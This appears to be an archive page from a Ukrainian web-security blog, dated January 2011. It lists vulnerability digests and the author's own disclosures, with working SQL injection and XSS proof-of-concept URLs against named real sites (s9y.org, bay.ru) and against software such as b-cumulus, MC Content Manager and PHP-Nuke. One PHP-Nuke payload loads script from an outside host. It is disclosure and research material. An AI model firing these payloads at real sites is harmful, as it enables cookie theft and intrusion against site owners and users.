Архів для категорії 'Уразливості'

Добірка уразливостей

22:32 18.01.2011

В даній добірці уразливості в веб додатках:

  • HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows, Remote Unauthorized Access to Data (деталі)
  • iBoutique.MALL 1.2 XSS vuln (деталі)
  • NetArtMEDIA Real Estate Portal v2.0 XSS vuln. + NetArtMEDIA lfi (деталі)
  • Open Classifieds version 1.7.0.2 XSS Vuln (деталі)
  • HP LoadRunner Agent on Windows, Remote Unauthenticated Arbitrary Code Execution (деталі)
  • HP Mercury LoadRunner Agent Trusted Input Remote Code Execution Vulnerability (деталі)
  • HP Performance Center Agent on Windows, Remote Unauthenticated Arbitrary Code Execution (деталі)
  • New smbind packages fix sql injection (деталі)
  • chillyCMS Multiple Vulnerabilities (деталі)
  • XSS bug in US Robotics firmware USR5463-v0_06.bin (деталі)

Нова уразливість на s9y.org

15:03 18.01.2011

03.06.2010

У жовтні, 30.10.2009, я знайшов SQL Injection уразливість на сайті http://s9y.org. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на s9y.org.

Детальна інформація про уразливість з’явиться пізніше.

18.01.2011

SQL Injection:

http://s9y.org/index.php?node=-1′%20or%20version()%3E’5

Дана уразливість вже виправлена.

Уразливість в b-cumulus

23:55 17.01.2011

Раніше я вже писав про уразливість у віджеті Flash Tag Cloud для Blogsa та інших ASP.NET движків. Така ж уразливість є і в b-cumulus (віджеті для Blogger, що також використовується на окремих сайтах), що використовує модифіковану версію tagcloud.swf розроблену автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

Нещодавно, 15.01.2011, я знайшов Cross-Site Scripting уразливість в b-cumulus. Про що найближчим часом повідомлю розробнику.

XSS:

Використовуватися може файл tagcloud.swf або tagcloud-ru.swf.

http://site/path/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/path/tagcloud-ru.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Уразливі всі версії b-cumulus.

Уразливості на www.bay.ru

15:21 17.01.2011

28.05.2010

У жовтні, 24.10.2009, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на сайті http://www.bay.ru (інтернет магазин). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливість на vch.kiev.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

17.01.2011

XSS:

http://www.bay.ru/search?query=%3Cimg%20src=''%20onerror=%22javascript:alert(document.cookie)%22%3E
http://www.bay.ru/search?min_price=%22%3E%3Cimg%20src=%22%22%20onerror=%22javascript:alert(document.cookie)%22%3E
http://www.bay.ru/search?max_price=%22%3E%3Cimg%20src=%22%22%20onerror=%22javascript:alert(document.cookie)%22%3E

Insufficient Anti-automation:

В формі реєстрації (https://www.bay.ru/customer/signup, що зараз змінила адресу на https://www.bay.ru/account/register) немає захисту від автоматизованих запитів (капчі).

Якщо XSS уразливості вже виправлені, то IAA уразливість досі не виправлена.

Уразливості в MC Content Manager

15:10 15.01.2011

05.11.2010

У липні, 07.07.2010, я знайшов Cross-Site Scripting, Brute Force та Full path disclosure уразливості в системі MC Content Manager (це українська комерційна CMS). Які я виявив на сайті www.br-ua.com та інших сайтах на даному движку. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в MC Content Manager.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

15.01.2011

XSS:

http://site/cms/’;alert(document.cookie);/*

Brute Force:

http://site/admin/

Full path disclosure:

http://site/cms/1/

http://site/ru/cms/1

http://site/en/cms/1

Уразливі потенційно всі версії MC Content Manager (MC Content Manager v.10.1.1 та попередні версії).

Добірка уразливостей

15:20 14.01.2011

В даній добірці уразливості в веб додатках:

  • Lexmark Multiple Laser printer FTP Remote Denial of Services (деталі)
  • Lexmark Multiple Laser Printer Remote Stack Overflow (деталі)
  • XSS vulnerability in SantaFox search module (деталі)
  • XSRF (CSRF) in SantaFox (деталі)
  • HP Insight Control Server Migration for Windows, Remote Cross Site Scripting (XSS) (деталі)
  • Member Management System v 4.0 XSS vuln (деталі)
  • NetArtMEDIA Car Portal v2.0 XSS vuln (деталі)
  • SpringSource tc Server unauthenticated remote access to JMX interface (деталі)
  • PowerStore™ 3 XSS vuln (деталі)
  • HP Performance Manager, Remote Unauthorized Access, Cross Site Scripting (XSS), Denial of Service (DoS) (деталі)

Уразливість на depositfiles.com

15:26 13.01.2011

26.05.2010

У жовтні, 23.10.2009, я знайшов Insufficent Anti-automation уразливість на сайті http://depositfiles.com (файлообмінник). Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

13.01.2011

Insufficent Anti-automation:

http://depositfiles.com/ru/tickets/

В контактній формі можна було ввести будь-який код капчі (тобто капча не працювала).

Дана уразливість зараз вже виправлена (шляхом заміни власної капчі на reCaptcha).

Добірка уразливостей

15:10 12.01.2011

В даній добірці уразливості в веб додатках:

  • HP OpenView NNM ovet_demandpoll sel CGI Variable Format String Remote Code Execution Vulnerability (деталі)
  • HP OpenView NNM netmon sel CGI Variable Remote Code Execution Vulnerability (деталі)
  • HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code (деталі)
  • XSS vulnerability in AContent (деталі)
  • XSS vulnerability in AContent (деталі)
  • XSS vulnerability in ATutor (деталі)
  • VMware View 3.1.3 addresses an important cross-site scripting vulnerability (деталі)
  • XSS vulnerability in AChecker (деталі)
  • XSS (cross site scripting) vulnerability in Serendipity (деталі)
  • aria2 metalink “name” Directory Traversal Vulnerability (деталі)

XSS та IAA уразливості в PHP-Nuke

15:01 11.01.2011

28.10.2010

У березні, 21.03.2010, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості в PHP-Nuke. Які я виявив на одному сайті, а нещодавно перевірив їх на офіційному сайті phpnuke.org. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливість в PHP-Nuke.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

11.01.2011

XSS:

POST запит на сторінці http://site/modules.php?name=Search

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')

В полі пошуку.

Це версія для Mozilla та Firefox (до 3.0), використовуючи MouseOverJacking можна зробити версію для всіх браузерів.

Insufficient Anti-automation:

http://site/modules.php?name=Feedback

В формі немає захисту від автоматизованих запитів (капчі).

Уразливі PHP-Nuke 8.1 та попередні версії (перевірено в PHP-Nuke 8.0 та 8.1).

Дані уразливості досі не виправлені розробниками PHP-Nuke - ні в своїй системі, ні в себе на сайті.

Добірка уразливостей

18:21 10.01.2011

В даній добірці уразливості в веб додатках:

  • AlienTechnology ALR-9900 default root password and backdoor (деталі)
  • New phpmyadmin packages fix several vulnerabilities (деталі)
  • Vulnerabilities in OCS Inventory NG (деталі)
  • HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution Vulnerability (деталі)
  • HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution Vulnerability (деталі)
  • HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution Vulnerability (деталі)
  • HP OpenView NNM snmpviewer.exe CGI Multiple Variable Remote Code Execution Vulnerability (деталі)
  • Directory Traversal in Axigen v7.4.1 running on Windows (деталі)
  • XSS vulnerability in AContent search (деталі)
  • XSS vulnerability in Atutor edit content folder (деталі)